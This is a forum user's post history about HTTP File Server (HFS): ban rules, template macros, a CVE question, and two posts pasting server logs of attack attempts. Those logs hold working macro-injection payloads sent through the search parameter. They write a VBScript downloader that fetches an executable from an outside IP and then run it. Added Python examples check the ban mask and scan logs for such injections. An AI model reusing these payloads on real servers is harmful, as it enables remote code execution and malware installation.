rejetto forum



Messages - D

1
HFS ~ HTTP File Server / Re: Ban IP using cloudflare
« on: November 12, 2023, 05:25:24 AM »
Your best option is to allow not * but just the IPs of cloudflare.
If anyone wonders how to do it... here's a ready-made solution (comes with no warranty)

Just add one ban rule for this IP mask and tick "disconnect with no reply"
Code:
\173.245.48.1-173.245.63.254;103.21.244.1-103.21.247.254;103.22.200.1-103.22.203.254;103.31.4.1-103.31.7.254;141.101.64.1-141.101.127.254;108.162.192.1-108.162.255.254;190.93.240.1-190.93.255.254;188.114.96.1-188.114.111.254;197.234.240.1-197.234.243.254;198.41.128.1-198.41.255.254;162.158.0.1-162.159.255.254;104.16.0.1-104.23.255.254;104.24.0.1-104.27.255.254;172.64.0.1-172.71.255.254;131.0.72.10-131.0.75.254
Source: https://www.cloudflare.com/ips/

Works for me I believe
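
A way to check what the posted ban rule does before relying on it (added example, not part of the original post and not HFS code). It assumes the mask syntax as it appears in the post: a leading "\" negates the mask, ";" separates entries, and "a-b" is an inclusive range; wildcard entries are not handled, and the function names are hypothetical.

```python
import ipaddress

# Ban mask as posted above, split across lines for readability.
POSTED_MASK = "\\" + ";".join("""
173.245.48.1-173.245.63.254 103.21.244.1-103.21.247.254
103.22.200.1-103.22.203.254 103.31.4.1-103.31.7.254
141.101.64.1-141.101.127.254 108.162.192.1-108.162.255.254
190.93.240.1-190.93.255.254 188.114.96.1-188.114.111.254
197.234.240.1-197.234.243.254 198.41.128.1-198.41.255.254
162.158.0.1-162.159.255.254 104.16.0.1-104.23.255.254
104.24.0.1-104.27.255.254 172.64.0.1-172.71.255.254
131.0.72.10-131.0.75.254
""".split())


def parse_mask(mask):
    """Return (inverted, [(first, last), ...]) for a range-only IP mask."""
    inverted = mask.startswith("\\")      # assumption: leading "\" negates
    ranges = []
    for part in filter(None, mask.lstrip("\\").split(";")):
        first, _, last = part.strip().partition("-")
        lo = ipaddress.IPv4Address(first)
        hi = ipaddress.IPv4Address(last or first)
        if lo > hi:
            raise ValueError(f"range out of order: {part}")
        ranges.append((lo, hi))
    return inverted, ranges


def is_banned(client_ip, mask=POSTED_MASK):
    """True if the ban rule would match this client address."""
    inverted, ranges = parse_mask(mask)
    ip = ipaddress.IPv4Address(client_ip)
    listed = any(lo <= ip <= hi for lo, hi in ranges)
    return listed != inverted             # negated mask bans what is NOT listed


def odd_boundaries(mask=POSTED_MASK):
    """Ranges that break the .1 / .254 pattern the rest of the mask follows."""
    return [f"{lo}-{hi}" for lo, hi in parse_mask(mask)[1]
            if int(lo) & 0xFF != 1 or int(hi) & 0xFF != 254]


if __name__ == "__main__":
    for ip in ("104.16.0.5", "203.0.113.7", "131.0.72.5"):  # constructed inputs
        print(ip, "banned" if is_banned(ip) else "allowed")
    print("check these ranges:", odd_boundaries())
```

With the mask as posted, 131.0.72.5 comes out as banned because the last range starts at 131.0.72.10.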

2
Quote
Did you try removing the decodeuri? like this
{.exists|%item-folder%%item-url%.jpg .}
Yes, it's even worse, almost no pics appear.
Quote
but command "exists" works both with url and with path on disk, so you can also try
{.exists|%item-resource%.jpg .}
or something like this, I'm not sure if item-resource has a final \
Yes it does: {.exists|%item-resource%\.jpg.} - this one works perfectly, thank you.
Quote
You can contact me on telegram or gmail chat, and we can have a closer look at what you need
Telegram - @rejetto ?

3
Quote
ok but what do you see on "bad" folders ?
Nothing at all.
Quote
if you want I can try to help you with that
How?

4
Quote
The easier way is to have {.decodeuri|%item-url%.} duplicated, after your code. That should make it visible.
Only worked for already good folders.
Quote
Did you consider using HFS 3?
What scares me is that I'll need to rebuild everything from scratch.

5
I am using a script for displaying folder previews
Code:
{. if|{. exists|%item-folder%{.decodeuri|%item-url%.}.jpg .}| <img src="%item-url%.jpg" /> |  .}
It doesn't work for some folders using Cyrillic names. What can I do about it?

6
Bug reports / A question about HFS v2.3m vulnerability
« on: July 25, 2023, 05:00:40 AM »
https://www.cvedetails.com/cve/CVE-2020-13432/

Quote
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers.

Confidentiality Impact: None (There is no impact to the confidentiality of the system.)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Partial (There is reduced performance or interruptions in resource availability.)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication: Not required (Authentication is not required to exploit the vulnerability.)
If I read it correctly, this is a DoS solution that can't deal real damage, such as remote code execution?

Which HFS version is more secure (2.3m / 2.4 / 3.0)? Logically, not the beta versions, but they may have some vulnerabilities patched, I guess.

7
HFS ~ HTTP File Server / How can I set up a simple redirect?
« on: March 23, 2022, 10:36:58 AM »
www.example.com/123/321.jpg
should be redirected to
www.example.com/000/321.jpg
and same with all files in /123/

is this possible?

8
It's easy:
1) Purchase domain (the one with cheapest renewal price I found is .download on porkbun)
2) Register on cloudflare, add your site, you will be given 2 nameservers
3) Go to your registrar where you purchased your domain and replace stock nameservers with cloudflare ones
Done.

Remember that cloudflare has 1 serious limit - users can't UPLOAD more than 100 mb to you.

9
HFS ~ HTTP File Server / Request login/password but accept any
« on: December 17, 2021, 12:11:13 PM »
Is this possible? I found option "accept any login for unprotected resources" but can't get it to work.

10
Bug reports / Re: Possible vulnerability
« on: December 14, 2021, 02:17:07 PM »
Here we go again, this time a little different:
Code:
14.12.2021 18:53:18 154.55.133.183:50174 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://154.55.133.183/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
14.12.2021 18:53:37 154.55.133.183:51758 Requested GET /?search=
14.12.2021 18:54:03 154.55.133.183:53636 Requested GET /?search=
14.12.2021 18:54:23 154.55.133.183:54859 Requested GET /?search=
Still nothing to worry about? Fixed in 2.3m?

11
Bug reports / Possible vulnerability
« on: December 11, 2021, 04:34:32 AM »
Since yesterday, someone is trying to pull code injection on me  :(  I'm on 2.3m
I'm not sure if I got hacked, I found no such files and my AV only quarantined the logs (scanned the link perhaps)
Is there a way to disable /?search functionality completely? I'm not using it anyway
Code:
10.12.2021 6:55:41 36.46.149.98 53274 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 6:55:45 36.46.149.98 53556 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 7:01:28 36.46.149.98 57608 Requested GET /
10.12.2021 7:01:28 36.46.149.98 57640 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code:
10.12.2021 6:55:36 36.46.149.98 52884 Requested GET /
10.12.2021 6:55:37 36.46.149.98 52917 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code:
11.12.2021 8:08:23 180.76.141.125 55846 Requested GET /
11.12.2021 8:08:24 180.76.141.125 55874 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/skol.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\skol.exe", 2 '//overwrite
> end with.}
11.12.2021 8:08:29 180.76.141.125 56070 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}
11.12.2021 8:08:32 180.76.141.125 56194 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}
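
A log check for the requests shown in the two "Possible vulnerability" posts above (added example, not part of the original posts and not HFS code): it rejoins the ">" continuation lines and flags any request whose target carries an HFS macro opener "{.", also after URL decoding. The sample log is constructed from the lines above with documentation-range addresses and a cut-down payload body; the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the log lines in the posts above.
SAMPLE_LOG = r"""10.12.2021 6:55:36 203.0.113.7 52884 Requested GET /
10.12.2021 6:55:37 203.0.113.7 52917 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp
> xHttp.Send
> end with.}
10.12.2021 6:55:41 203.0.113.7 53274 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
14.12.2021 18:53:18 198.51.100.9:50174 Requested GET /?search=%7B.exec%7CC:\Users\Public\1.exe.%7D
14.12.2021 18:54:03 198.51.100.9:53636 Requested GET /?search=holiday
"""

# Both layouts seen above: "ip port" and "ip:port".
ENTRY = re.compile(r"^(\d{1,2}\.\d{1,2}\.\d{4} \d{1,2}:\d{2}:\d{2}) "
                   r"(\d{1,3}(?:\.\d{1,3}){3})[ :](\d+) Requested (\w+) (.*)$")
# Macro opener "{." followed by the macro name, e.g. "{.exec|" or "{. exists|".
MACRO = re.compile(r"\{\.\s*([^|{}.\s]+)")


def entries(log_text):
    """Yield (timestamp, ip, method, target); '>' continuation lines rejoined."""
    current = None
    for line in log_text.splitlines():
        m = ENTRY.match(line)
        if m:
            if current:
                yield tuple(current)
            ts, ip, _port, method, target = m.groups()
            current = [ts, ip, method, target]
        elif current and line.startswith(">"):
            current[3] += "\n" + line[1:].lstrip()
    if current:
        yield tuple(current)


def macro_injection_attempts(log_text):
    """Return [(timestamp, ip, [macro names])] for requests carrying macros."""
    hits = []
    for ts, ip, _method, target in entries(log_text):
        names = MACRO.findall(unquote(target))   # catch %7B. as well as {.
        if names:
            hits.append((ts, ip, sorted({n.lower() for n in names})))
    return hits


if __name__ == "__main__":
    for ts, ip, names in macro_injection_attempts(SAMPLE_LOG):
        print(f"{ts}  {ip}  macros in request: {', '.join(names)}")
```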

12
HTML & templates / Re: Custom folder previews
« on: October 28, 2021, 06:31:11 AM »
The question is still relevant, can someone help, please?

13
HFS ~ HTTP File Server / Re: Why file system cleared?
« on: October 04, 2021, 07:25:25 AM »
Same, and my backup got overwritten by autosave :(

14
Bug reports / False errors on upload
« on: September 16, 2021, 10:54:00 PM »
They only appear in logs. I'm using HFS 2.3m

Code:
Upload failed for 20210916_221111.jpg: Not allowed.
Upload failed 20210916_221111.jpg
Upload failed for 20210916_221155.jpg: Not allowed.
Upload failed 20210916_221155.jpg
Upload failed for 20210916_221259.jpg: Not allowed.
Upload failed 20210916_221259.jpg
Requested POST /
Uploading 20210916_221111.jpg
Fully uploaded 20210916_221111.jpg - 71.2 K @ 316.4 KB/s
Uploading 20210916_221155.jpg
Fully uploaded 20210916_221155.jpg - 114.0 K @ 797.2 KB/s
Uploading 20210916_221259.jpg
Fully uploaded 20210916_221259.jpg - 163.8 K @ 1.1 MB/s

15
HTML & templates / Re: Custom folder previews
« on: September 15, 2021, 10:07:34 AM »
for hfs2.4
Thanks. How can I move these images into Hits column?
